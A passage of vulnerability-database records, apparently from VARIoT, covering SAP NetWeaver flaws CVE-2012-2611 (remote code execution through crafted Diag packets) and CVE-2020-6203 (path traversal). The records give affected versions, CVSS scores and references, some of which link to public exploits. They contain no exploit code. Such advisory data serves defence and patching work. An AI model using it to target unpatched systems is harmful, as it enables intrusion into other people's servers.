The DiagTraceR3Info function in the Dialog processor in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2, when a certain Developer Trace configuration is enabled, allows remote attackers to execute arbitrary code via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201205-0127",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.6,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.0 ehp1 (disp+work.exe 7010.29.15.58313)"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 0.8,
"vendor": "sap",
"version": "7.0 ehp2 (disp+work.exe 7200.70.18.23869)"
},
{
"model": "netweaver ehp2",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
},
{
"model": "netweaver ehp1",
"scope": "eq",
"trust": 0.3,
"vendor": "sap",
"version": "7.0"
}
],
"sources": [
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002405"
},
{
"db": "NVD",
"id": "CVE-2012-2611"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-233"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2012-2611"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security - Corelabs",
"sources": [
{
"db": "BID",
"id": "53424"
}
],
"trust": 0.3
},
"cve": "CVE-2012-2611",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 9.3,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2012-2611",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2012-2611",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201205-233",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULMON",
"id": "CVE-2012-2611",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2611"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002405"
},
{
"db": "NVD",
"id": "CVE-2012-2611"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-233"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The DiagTraceR3Info function in the Dialog processor in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2, when a certain Developer Trace configuration is enabled, allows remote attackers to execute arbitrary code via a crafted SAP Diag packet. SAP NetWeaver is prone to a remote code-execution vulnerability and multiple denial-of-service vulnerabilities. \nSuccessfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or crash the application",
"sources": [
{
"db": "NVD",
"id": "CVE-2012-2611"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002405"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "VULMON",
"id": "CVE-2012-2611"
}
],
"trust": 1.98
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://vulmon.com/exploitdetails?qidtp=exploitdb\u0026qid=21034",
"trust": 0.3,
"type": "exploit"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2611"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2012-2611",
"trust": 2.8
},
{
"db": "SECTRACK",
"id": "1027052",
"trust": 1.1
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002405",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201205-233",
"trust": 0.6
},
{
"db": "BID",
"id": "53424",
"trust": 0.3
},
{
"db": "EXPLOIT-DB",
"id": "21034",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2012-2611",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2611"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002405"
},
{
"db": "NVD",
"id": "CVE-2012-2611"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-233"
}
]
},
"id": "VAR-201205-0127",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.2949160133333333
},
"last_update_date": "2023-12-18T12:22:02.666000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Acknowledgments to Security Researchers",
"trust": 0.8,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"title": "martingalloar",
"trust": 0.1,
"url": "https://github.com/martingalloar/martingalloar "
},
{
"title": "publications",
"trust": 0.1,
"url": "https://github.com/martingalloar/publications "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2611"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002405"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-20",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-002405"
},
{
"db": "NVD",
"id": "CVE-2012-2611"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.0,
"url": "http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities"
},
{
"trust": 1.7,
"url": "https://service.sap.com/sap/support/notes/1687910"
},
{
"trust": 1.7,
"url": "http://scn.sap.com/docs/doc-8218"
},
{
"trust": 1.1,
"url": "http://www.securitytracker.com/id?1027052"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-2611"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-2611"
},
{
"trust": 0.3,
"url": "http://www.sap.com/platform/netweaver/index.epx"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/20.html"
},
{
"trust": 0.1,
"url": "http://tools.cisco.com/security/center/viewalert.x?alertid=26830"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/21034/"
},
{
"trust": 0.1,
"url": "https://www.rapid7.com/db/modules/exploit/windows/misc/sap_netweaver_dispatcher"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2012-2611"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002405"
},
{
"db": "NVD",
"id": "CVE-2012-2611"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-233"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2012-2611"
},
{
"db": "BID",
"id": "53424"
},
{
"db": "JVNDB",
"id": "JVNDB-2012-002405"
},
{
"db": "NVD",
"id": "CVE-2012-2611"
},
{
"db": "CNNVD",
"id": "CNNVD-201205-233"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-05-15T00:00:00",
"db": "VULMON",
"id": "CVE-2012-2611"
},
{
"date": "2012-05-08T00:00:00",
"db": "BID",
"id": "53424"
},
{
"date": "2012-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-002405"
},
{
"date": "2012-05-15T04:21:43.547000",
"db": "NVD",
"id": "CVE-2012-2611"
},
{
"date": "2012-05-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201205-233"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2012-08-19T00:00:00",
"db": "VULMON",
"id": "CVE-2012-2611"
},
{
"date": "2012-09-04T05:50:00",
"db": "BID",
"id": "53424"
},
{
"date": "2012-05-16T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2012-002405"
},
{
"date": "2012-08-19T03:44:24.613000",
"db": "NVD",
"id": "CVE-2012-2611"
},
{
"date": "2012-05-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201205-233"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201205-233"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver of DiagTraceR3Info Vulnerability in arbitrary code execution in function",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2012-002405"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "input validation",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201205-233"
}
],
"trust": 0.6
}
}
var-202003-1737
Vulnerability from variot
SAP NetWeaver UDDI Server (Services Registry), versions- 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50; allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing 'traverse to parent directory' are passed through to the file APIs, leading to Path Traversal. SAP NetWeaver UDDI Server (Services Registry) Exists in a past traversal vulnerability.Information may be obtained and tampered with
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202003-1737",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.10"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.11"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.20"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.30"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.31"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.40"
},
{
"model": "netweaver",
"scope": "eq",
"trust": 1.8,
"vendor": "sap",
"version": "7.50"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002739"
},
{
"db": "NVD",
"id": "CVE-2020-6203"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.10:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.11:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.20:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.30:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.31:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.40:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:sap:netweaver:7.50:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2020-6203"
}
]
},
"cve": "CVE-2020-6203",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.4,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 4.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.4,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "JVNDB-2020-002739",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.2,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "cna@sap.com",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.3,
"impactScore": 6.0,
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 9.1,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "JVNDB-2020-002739",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2020-6203",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "cna@sap.com",
"id": "CVE-2020-6203",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "JVNDB-2020-002739",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-202003-588",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002739"
},
{
"db": "NVD",
"id": "CVE-2020-6203"
},
{
"db": "NVD",
"id": "CVE-2020-6203"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-588"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver UDDI Server (Services Registry), versions- 7.10, 7.11, 7.20, 7.30, 7.31, 7.40, 7.50; allows an attacker to exploit insufficient validation of path information provided by users, thus characters representing \u0027traverse to parent directory\u0027 are passed through to the file APIs, leading to Path Traversal. SAP NetWeaver UDDI Server (Services Registry) Exists in a past traversal vulnerability.Information may be obtained and tampered with",
"sources": [
{
"db": "NVD",
"id": "CVE-2020-6203"
},
{
"db": "JVNDB",
"id": "JVNDB-2020-002739"
}
],
"trust": 1.62
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2020-6203",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2020-002739",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202003-588",
"trust": 0.6
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002739"
},
{
"db": "NVD",
"id": "CVE-2020-6203"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-588"
}
]
},
"id": "VAR-202003-1737",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.27111164
},
"last_update_date": "2023-12-18T13:18:20.465000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SAP Security Patch Day - March 2020",
"trust": 0.8,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=540935305"
},
{
"title": "SAP NetWeaver UDDI Server Repair measures for path traversal vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=112017"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002739"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-588"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002739"
},
{
"db": "NVD",
"id": "CVE-2020-6203"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.6,
"url": "https://launchpad.support.sap.com/#/notes/2806198"
},
{
"trust": 1.6,
"url": "https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageid=540935305"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-6203"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-6203"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002739"
},
{
"db": "NVD",
"id": "CVE-2020-6203"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-588"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002739"
},
{
"db": "NVD",
"id": "CVE-2020-6203"
},
{
"db": "CNNVD",
"id": "CNNVD-202003-588"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-03-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-002739"
},
{
"date": "2020-03-10T21:15:14.417000",
"db": "NVD",
"id": "CVE-2020-6203"
},
{
"date": "2020-03-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-588"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-03-25T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2020-002739"
},
{
"date": "2020-03-12T16:14:44.907000",
"db": "NVD",
"id": "CVE-2020-6203"
},
{
"date": "2020-03-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202003-588"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-588"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver UDDI Server Past Traversal Vulnerability in",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2020-002739"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202003-588"
}
],
"trust": 0.6
}
}
var-201710-1465
Vulnerability from variot
SAP NetWeaver is prone to an information-disclosure vulnerability. Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
